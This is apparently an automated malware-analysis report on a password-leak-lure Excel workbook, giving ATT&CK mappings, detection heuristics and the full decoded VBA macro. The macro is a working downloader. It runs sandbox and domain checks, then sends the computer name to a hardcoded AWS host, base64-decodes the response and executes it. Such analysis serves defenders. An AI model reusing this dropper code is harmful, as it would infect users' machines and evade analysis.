MALICIOUS
518
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
T1071.001 Web Protocols
The VBA macro within the document executes an Auto_Open subroutine which attempts to download a file from a hardcoded URL using MSXML2.XMLHTTP. The downloaded content is then saved to disk as 'Details.dat' in the user's temporary directory. This behavior, combined with the 'Obfuscated VBA Shell command with URL' and 'VBA downloads and writes a file to disk' heuristics, strongly indicates a downloader functionality. The document body content, listing email addresses and 'Password Leaked', serves as a lure to encourage user interaction.
Heuristics 12
-
ClamAV: Doc.Downloader.Valyria-10026858-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-10026858-0
-
VBA project inside OOXML medium 9 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set s = CreateObject("WScript.Shell") -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Set s = CreateObject("WScript.Shell") -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Set b = CreateObject("WScript.Network") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
r.Write o.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set b = CreateObject("WScript.Network") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
a = Environ("Temp") & "\Details.dat" -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ec2-18-184-17-12.eu-central-1.compute.amazonaws.com/standardchartered/passleak/180821/ Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4717 bytes |
SHA-256: 3239b648e56d5296a543ca593d269ada5aa81181e87318270d1960e111736fbb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Ten_skoroszyt"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Arkusz1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Auto_Open()
ActiveSheet.Shapes("fBox").Visible = False
ActiveSheet.Shapes("fText").Visible = False
ActiveSheet.Unprotect
ActiveSheet.Range("A1", "Z100").Locked = True
ActiveSheet.Protect
checkFileName
End Sub
Sub Workbook_BeforeClose()
ActiveSheet.Shapes("fBox").Visible = True
ActiveSheet.Shapes("fText").Visible = True
ActiveSheet.Unprotect
ActiveSheet.Range("A1", "Z100").Locked = True
ActiveSheet.Protect
End Sub
Private Sub Get_Data(userId)
Set b = CreateObject("WScript.Network")
c = b.ComputerName
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.Open "GET", "http://ec2-18-184-17-12.eu-central-1.compute.amazonaws.com/standardchartered/passleak/180821/" & userId & "?uid=" & c & "&seid=" & DateDiff("s", "1/1/1970 00:00:00", Now()), False
o.Send
Set r = CreateObject("ADODB.Stream")
r.Type = 1 'adTypeBinary
a = Environ("Temp") & "\Details.dat"
b = Environ("Temp") & "\LeakDetails.dat"
d = Environ("Temp") & "\leakdetails.log"
r.Open
r.Write o.responseBody
r.SaveToFile a, 2 'adSaveCreateOverWrite
Set r = Nothing
Set c = CreateObject("Scripting.FileSystemObject")
c.CopyFile a, b
Set fso = CreateObject("Scripting.Filesystemobject")
Set base_file = fso.OpenTextFile(b, 1)
Content = base_file.ReadAll()
base_file.Close
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.DataType = "bin.base64"
oNode.Text = Content
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.SaveToFile d, 2
Set s = CreateObject("WScript.Shell")
s.Exec d
c.DeleteFile (a)
c.DeleteFile (b)
End Sub
Private Sub checkFileName()
Dim name As String
Dim nArray() As String
name = Application.Caption
nArray = Split(name, " ")
If nArray(0) <> "LeakedPasswords180821.xlsm" Then
badName = True
Else
checkRecentDocs
End If
End Sub
Private Sub checkRecentDocs()
Dim hard
If Application.RecentFiles.Count < 3 Then
Application.Quit
Else
IsHardwareReliable
End If
End Sub
Private Sub IsHardwareReliable()
Dim objWMIService, objItem, colItems, dotSplace, hwGtest
Dim totalSize, sumRamVal, cpusNum As Integer
hwGtest = True
totalSize = 0
sumRamVal = 0
cpusNum = 0
Const wbemFlagReturnImmediately = &H10
Const wbemFlagForwardOnly = &H20
dotSplace = "."
Set objWMIService = GetObject _
("winmgmts:\\" & dotSplace & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * from Win32_LogicalDisk")
For Each objItem In colItems
Dim num
num = Int(objItem.Size / 1073741824)
If num > 0 Then
totalSize = totalSize + num
End If
Next
If totalSize < 100 Then
hwGtest = False
End If
Set colComputer = objWMIService.ExecQuery _
("Select * from Win32_ComputerSystem")
For Each objComputer In colComputer
sumRamVal = sumRamVal + Int((objComputer.TotalPhysicalMemory) / 1048576) + 1
Next
If sumRamVal < 4096 Then
hwGtest = False
End If
Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_Processor", "WQL", _
wbemFlagReturnImmediately + wbemFlagForwardOnly)
For Each objItem In colItems2
cpusNum = cpusNum + objItem.NumberOfLogicalProcessors
Next
If cpusNum < 4 Then
hwGtest = False
End If
If hwGtest Then
checkPartOfDomain objWMIService
End If
End Sub
Private Sub checkPartOfDomain(objWMIService)
inDomain = False
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
If objItem.partOfDomain Then
inDomain = True
End If
Next
If Not inDomain Then
Application.Quit
Else
Get_Data "a4ceda3103a64cedc2d0289a1913855a"
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 18432 bytes |
SHA-256: f37b1f8516d407cf322b8063839cc73666bc88427b8a6788e4881297f8baac5e |
|||
|
Detection
ClamAV:
Doc.Downloader.Valyria-10026858-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.